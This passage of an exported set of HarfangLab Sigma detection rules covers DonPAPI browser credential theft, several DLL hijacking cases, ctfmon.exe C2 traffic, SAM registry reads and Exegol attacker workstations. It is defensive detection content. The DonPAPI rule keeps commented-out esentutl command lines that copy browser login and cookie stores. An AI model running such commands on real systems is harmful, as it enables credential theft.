"high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/login-securite/DonPAPI/", "https://attack.mitre.org/techniques/T1047/", "https://attack.mitre.org/techniques/T1555/003/" ], "name": "t1555_003_donpapi_browser_credentials.yml", "content": "title: Browser Credentials Gathered via DonPAPI\nid: 2d125387-a98b-4b47-843e-3e6a3fb7b5eb\ndescription: |\n Detects browser credential gathering via a legacy version of the DonPAPI tool.\n DonPAPI is a Python tool specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials.\n DPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions used in particular used by browsers.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/login-securite/DonPAPI/\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/03/05\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.credential_access\n - attack.t1555.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # CommandLine:\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\*.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data /d ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\* /d ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\*.tmp'\n ProcessParentName: wmiprvse.exe\n ProcessName: 'cmd.exe'\n CommandLine|re: '.*cmd.exe /Q /c esentutl.exe /y ([^/]*(/d )?){2}.tmp'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2d125387-a98b-4b47-843e-3e6a3fb7b5eb", "rule_name": "Browser Credentials Gathered via DonPAPI", "rule_description": "Detects browser credential gathering via a legacy version of the DonPAPI tool.\nDonPAPI is a Python tool specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials.\nDPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions used in particular used by browsers.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n", "rule_creation_date": "2024-03-05", "rule_modified_date": "2025-01-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.execution" ], "rule_technique_tags": [ "attack.t1047", "attack.t1555.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2d20cb47-e527-4738-b5ba-ab12cd7da516", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.096927Z", "creation_date": "2026-03-23T11:45:34.096929Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.096934Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_fxsunatd.yml", "content": "title: DLL Hijacking via fxsunatd.exe\nid: 2d20cb47-e527-4738-b5ba-ab12cd7da516\ndescription: |\n Detects potential Windows DLL Hijacking via fxsunatd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fxsunatd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\FXSAPI.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2d20cb47-e527-4738-b5ba-ab12cd7da516", "rule_name": "DLL Hijacking via fxsunatd.exe", "rule_description": "Detects potential Windows DLL Hijacking via fxsunatd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2d438226-15c9-4f1f-9818-560efb9ac7de", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.605179Z", "creation_date": "2026-03-23T11:45:34.605182Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.605189Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/ThePorgs/Exegol/", "https://exegol.readthedocs.io/", "https://attack.mitre.org/techniques/T1018/" ], "name": "t1018_silent_workstation_name_exegol.yml", "content": "title: Activity linked to Workstation Named Exegol\nid: 2d438226-15c9-4f1f-9818-560efb9ac7de\ndescription: |\n Detects an activity from a machine whose name is Exegol, a fully configured Linux-based Docker image for penetration testing and red teaming.\n Attackers may connect external machines to the network to conduct malicious activities.\n It is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\nreferences:\n - https://github.com/ThePorgs/Exegol/\n - https://exegol.readthedocs.io/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/06/04\nmodified: 2025/06/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Exegol\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n - Workstation|startswith: 'exegol-'\n - WorkstationName|startswith: 'exegol-'\n\n condition: selection\nlevel: medium\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2d438226-15c9-4f1f-9818-560efb9ac7de", "rule_name": "Activity linked to Workstation Named Exegol", "rule_description": "Detects an activity from a machine whose name is Exegol, a fully configured Linux-based Docker image for penetration testing and red teaming.\nAttackers may connect external machines to the network to conduct malicious activities.\nIt is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\n", "rule_creation_date": "2025-06-04", "rule_modified_date": "2025-06-10", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1018" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2d48e659-e7f3-42cc-ab39-2bb7040a806c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.081072Z", "creation_date": "2026-03-23T11:45:34.081075Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.081079Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://twitter.com/Cryptolaemus1/status/1759740446857625639", "https://twitter.com/reecdeep/status/1759603556288459149", "https://attack.mitre.org/techniques/T1055/", "https://attack.mitre.org/techniques/T1571/" ], "name": "t1055_ctfmon_suspicious_network_communication.yml", "content": "title: Suspicious ctfmon.exe Network Communication\nid: 2d48e659-e7f3-42cc-ab39-2bb7040a806c\ndescription: |\n Detects network communications via a non-standard port from the legitimate ctfmon.exe Windows binary.\n This can indicate malicious activity, such as communication with a C2 server, after an adversary injects malicious code into a suspended and hollowed process to evade process-based defenses.\n This technique is often used by attackers to establish command-and-control (C2) communication while maintaining persistence and evading detection.\n It has been observed in attacks such as those involving the Pikabot Malware, which used this method to deploy the Medusa Stealer.\n It is recommended to investigate the parent process responsible for initiating this communication, analyze the network traffic details, and examine the destination IP address to determine the legitimacy of the activity.\n Additionally, trying to dump the ctfmon.exe process for analysis can be useful to ensure it is not being abused for malicious purposes.\nreferences:\n - https://twitter.com/Cryptolaemus1/status/1759740446857625639\n - https://twitter.com/reecdeep/status/1759603556288459149\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2024/02/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.command_and_control\n - attack.t1571\n - attack.t1071.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'CTFMON.EXE'\n ProcessParentCommandLine|contains: '?'\n\n filter_parent:\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService'\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TextInputManagementService'\n\n filter_ip:\n DestinationIp|cidr:\n - '0.0.0.0/8' # RFC 1122, Section 3.2.1.3 \"This\" Network*\n - '10.0.0.0/8' # RFC 1918 Private-Use Networks*\n - '127.0.0.0/8' # RFC 1122, Section 3.2.1.3 Loopback*\n - '169.254.0.0/16' # RFC 3927 Link Local*\n - '172.16.0.0/12' # RFC 1918 Private-Use Networks*\n - '192.0.0.0/24' # RFC 5736 IETF Protocol Assignments*\n - '192.0.2.0/24' # RFC 5737 TEST-NET-1*\n - '192.88.99.0/24' # RFC 3068 6to4 Relay Anycast*\n - '192.168.0.0/16' # RFC 1918 Private-Use Networks*\n - '198.18.0.0/15' # RFC 2544 Network Interconnect Device Benchmark Testing*\n - '198.51.100.0/24' # RFC 5737 TEST-NET-2*\n - '203.0.113.0/24' # RFC 5737 TEST-NET-3*\n - '224.0.0.0/4' # RFC 3171 Multicast*\n - '240.0.0.0/4' # RFC 1112, Section 4 Reserved for Future Use*\n - '255.255.255.255/32' # RFC 919, Section 7 Limited Broadcast*\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2d48e659-e7f3-42cc-ab39-2bb7040a806c", "rule_name": "Suspicious ctfmon.exe Network Communication", "rule_description": "Detects network communications via a non-standard port from the legitimate ctfmon.exe Windows binary.\nThis can indicate malicious activity, such as communication with a C2 server, after an adversary injects malicious code into a suspended and hollowed process to evade process-based defenses.\nThis technique is often used by attackers to establish command-and-control (C2) communication while maintaining persistence and evading detection.\nIt has been observed in attacks such as those involving the Pikabot Malware, which used this method to deploy the Medusa Stealer.\nIt is recommended to investigate the parent process responsible for initiating this communication, analyze the network traffic details, and examine the destination IP address to determine the legitimacy of the activity.\nAdditionally, trying to dump the ctfmon.exe process for analysis can be useful to ensure it is not being abused for malicious purposes.\n", "rule_creation_date": "2024-02-23", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1055", "attack.t1071.001", "attack.t1571" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2d774838-fe3c-4704-a1c2-8e1287b6b0ee", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.095725Z", "creation_date": "2026-03-23T11:45:34.095728Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.095732Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/matteodalgrande/windows-hash-crack-python37/blob/master/README.md", "https://attack.mitre.org/techniques/T1003/002/" ], "name": "t1003_002_susp_sam_database_accessed.yml", "content": "title: SAM Database Read from Registry via Samdump\nid: 2d774838-fe3c-4704-a1c2-8e1287b6b0ee\ndescription: |\n Detects a suspicious read operation on registry keys storing Windows account parameters.\n Adversaries may extract user information stored in SAM database to retrieve user's password hashes.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://github.com/matteodalgrande/windows-hash-crack-python37/blob/master/README.md\n - https://attack.mitre.org/techniques/T1003/002/\ndate: 2024/04/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject:\n - 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\F'\n - 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\V'\n Image|contains: '?'\n\n filter_lsass:\n - Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n - ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_remote_registry:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2d774838-fe3c-4704-a1c2-8e1287b6b0ee", "rule_name": "SAM Database Read from Registry via Samdump", "rule_description": "Detects a suspicious read operation on registry keys storing Windows account parameters.\nAdversaries may extract user information stored in SAM database to retrieve user's password hashes.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n", "rule_creation_date": "2024-04-02", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.discovery" ], "rule_technique_tags": [ "attack.t1003.002", "attack.t1012" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2d93119f-c45c-4f21-b353-cd28185a6bcb", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093883Z", "creation_date": "2026-03-23T11:45:34.093885Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093889Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_quser.yml", "content": "title: DLL Hijacking via quser.exe\nid: 2d93119f-c45c-4f21-b353-cd28185a6bcb\ndescription: |\n Detects potential Windows DLL Hijacking via quser.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'quser.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\UTILDLL.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2d93119f-c45c-4f21-b353-cd28185a6bcb", "rule_name": "DLL Hijacking via quser.exe", "rule_description": "Detects potential Windows DLL Hijacking via quser.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2da166af-7d44-4ca3-a8d3-3210b643d807", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618655Z", "creation_date": "2026-03-23T11:45:34.618657Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618662Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_vmwarexferlogs.yml", "content": "title: DLL Hijacking via VMwareXferlogs.exe\nid: 2da166af-7d44-4ca3-a8d3-3210b643d807\ndescription: |\n Detects potential Windows DLL Hijacking via VMwareXferlogs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate VMwareXferlogs executable to another location and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/02\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'xferlogs.exe'\n ProcessSignature: 'VMWare, Inc.'\n ImageLoaded|endswith: '\\glib-2.0.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\VMware\\VMware Tools\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\VMware\\VMware Tools\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'VMware, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2da166af-7d44-4ca3-a8d3-3210b643d807", "rule_name": "DLL Hijacking via VMwareXferlogs.exe", "rule_description": "Detects potential Windows DLL Hijacking via VMwareXferlogs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate VMwareXferlogs executable to another location and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-08-02", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2da5035b-dc02-4700-8b81-859d0243e461", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.594519Z", "creation_date": "2026-03-23T11:45:34.594522Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.594529Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dmcfghost.yml", "content": "title: DLL Hijacking via dmcfghost.exe\nid: 2da5035b-dc02-4700-8b81-859d0243e461\ndescription: |\n Detects potential Windows DLL Hijacking via dmcfghost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the 